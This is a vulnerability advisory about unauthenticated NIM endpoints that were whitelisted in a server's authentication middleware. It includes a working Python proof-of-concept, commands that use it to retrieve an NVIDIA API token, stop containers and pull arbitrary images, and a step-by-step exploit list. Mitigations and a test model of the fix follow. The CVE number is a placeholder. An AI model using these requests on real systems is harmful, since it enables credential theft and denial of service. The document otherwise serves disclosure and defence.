NVIDIA NIM, Missing Authentication, CVE-2024-XXXX (High)

The vulnerability arises from a misconfiguration in the authentication middleware of the NVIDIA NIM service. In `packages/server/src/utils/constants.ts`, the path `'/api/v1/nvidia-nim'` is included in the `WHITELIST_URLS` array, which causes the global JWT/API-key authentication to be completely bypassed for all endpoints under `/api/v1/nvidia-nim/`. The controller actions in `packages/server/src/controllers/nvidia-nim/index.ts` do not implement any additional authentication checks, leaving every subpath open to unauthenticated access.

This affects critical operations such as token generation (`/get-token`), container lifecycle management (`/start-container`, `/stop-container`, `/pull-image`), and information disclosure endpoints (`/list-running-containers`, `/get-image`, `/get-container`). An unauthenticated attacker can retrieve a valid NVIDIA API token from `/get-token`, which grants access to NVIDIA's inference API and exposes over 170 LLM models. On systems with Docker/NIM installed, the attacker can list running containers, stop containers (causing denial of service), start containers with arbitrary images, and pull malicious Docker images.

The endpoints return HTTP 500 errors (instead of 401) when the container runtime is unavailable, confirming the authentication bypass. The root cause is a simple whitelist oversight, making this a CWE-306 (Missing Authentication for Critical Function) issue with a CVSS v3.1 score of 8.6 (High).

Platform: NVIDIA NIM
Version: Unspecified
Vulnerability: Missing Authentication
Severity: High
Date: 2024-12-01

Prediction: Patch expected soon

What Undercode Say:

Proof of Concept Python script (poc.py):

```python
#!/usr/bin/env python3
"""
POC: Privileged NVIDIA NIM endpoints are unauthenticated
Usage: python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
"""
import argparse
import urllib.error
import urllib.request


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port")
    ap.add_argument("--path", required=True, help="NIM endpoint path")
    ap.add_argument("--method", default="GET", choices=["GET", "POST"])
    ap.add_argument("--data", default="", help="Raw request body for POST")
    args = ap.parse_args()

    # Join base URL and path with exactly one slash between them.
    url = args.target.rstrip("/") + "/" + args.path.lstrip("/")
    body = args.data.encode("utf-8") if args.method == "POST" else None

    # No Authorization header is sent: the request is deliberately unauthenticated.
    req = urllib.request.Request(
        url,
        data=body,
        method=args.method,
        headers={"Content-Type": "application/json"} if body else {},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            print(r.read().decode("utf-8", errors="replace"))
    except urllib.error.HTTPError as e:
        # Error responses (e.g. 500 instead of 401) still carry a body worth printing.
        print(e.read().decode("utf-8", errors="replace"))


if __name__ == "__main__":
    main()
```

```bash
# Obtain NVIDIA API token (no authentication)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token

# List running containers
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers

# Stop a container (DoS)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \
  --method POST --data '{"containerId":"<target_id>"}'

# Pull arbitrary image
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \
  --method POST --data '{"imageTag":"malicious/image","apiKey":"any"}'

# Validate token against NVIDIA API
curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
```

Exploit:

  • Send unauthenticated GET request to `/api/v1/nvidia-nim/get-token` to retrieve a valid NVIDIA API token.
  • Use the token to list all available models via NVIDIA’s API.
  • Send unauthenticated GET to `/api/v1/nvidia-nim/list-running-containers` to gather container IDs.
  • Send unauthenticated POST to `/api/v1/nvidia-nim/stop-container` with a container ID to stop it (DoS).
  • Send unauthenticated POST to `/api/v1/nvidia-nim/pull-image` with an arbitrary image tag to consume resources or introduce malicious images.
  • Send unauthenticated POST to `/api/v1/nvidia-nim/start-container` to run containers with attacker-controlled images.

Protection from this CVE:

  • Remove `'/api/v1/nvidia-nim'` from the `WHITELIST_URLS` array in `constants.ts`.
  • Implement authentication checks in all NIM controller actions.
  • Restrict network access to NIM endpoints using firewall rules.
  • Apply the official patch once released.
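
The first two mitigations, modelled as an added example (not the project's own code): a simplified prefix-whitelist gate showing why the affected endpoints answer 500 rather than 401, and a regression check that every NIM path listed above rejects unauthenticated requests once the entry is removed or the controller checks credentials itself. Only `WHITELIST_URLS` and the endpoint paths come from the page; the prefix-matching logic, the `/api/v1/ping` entry and all function names are assumptions.

```javascript
// Added example: simplified model of a prefix-whitelist auth gate.
// Function names and '/api/v1/ping' are hypothetical, not taken from the project.
const NIM_PATHS = [
  '/get-token', '/start-container', '/stop-container', '/pull-image',
  '/list-running-containers', '/get-image', '/get-container',
].map((p) => '/api/v1/nvidia-nim' + p);

// Constructed whitelists: '/api/v1/ping' stands in for a legitimately public route.
const WHITELIST_VULNERABLE = ['/api/v1/ping', '/api/v1/nvidia-nim'];
const WHITELIST_FIXED = ['/api/v1/ping'];

// Global gate: a whitelisted prefix skips the credential check for every subpath.
function isWhitelisted(path, whitelist) {
  return whitelist.some((prefix) => path === prefix || path.startsWith(prefix + '/'));
}

// Stand-in controller: the container runtime is absent, so it always fails with 500.
function nimController() {
  return 500;
}

// Returns the HTTP status a request would receive.
// `credentialsValid` models the outcome of the JWT/API-key check.
function handle(path, credentialsValid, whitelist, requireAuthInController = false) {
  if (!isWhitelisted(path, whitelist) && !credentialsValid) return 401;
  // Defence in depth: the controller re-checks instead of trusting the gate.
  if (requireAuthInController && !credentialsValid) return 401;
  return nimController();
}

// Regression check: lists NIM paths that do NOT answer 401 when unauthenticated.
function unauthenticatedExposure(whitelist, requireAuthInController = false) {
  return NIM_PATHS.filter(
    (p) => handle(p, false, whitelist, requireAuthInController) !== 401
  );
}

console.log('vulnerable whitelist:', unauthenticatedExposure(WHITELIST_VULNERABLE).length, 'exposed');
console.log('entry removed:', unauthenticatedExposure(WHITELIST_FIXED).length, 'exposed');
console.log('controller check only:', unauthenticatedExposure(WHITELIST_VULNERABLE, true).length, 'exposed');
```

A 500 from the model means the request reached the controller, which is the same signal the advisory uses to confirm the bypass; a correctly gated endpoint returns 401 before the controller runs.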

Impact:

  • Leakage of valid NVIDIA API tokens, granting access to LLM models.
  • Full control over container runtime: listing, stopping, starting, and pulling arbitrary images.
  • Denial of service through container termination.
  • Information disclosure of container details and image metadata.
  • Potential resource exhaustion and malicious image deployment.

Sources:

Reported By: github.com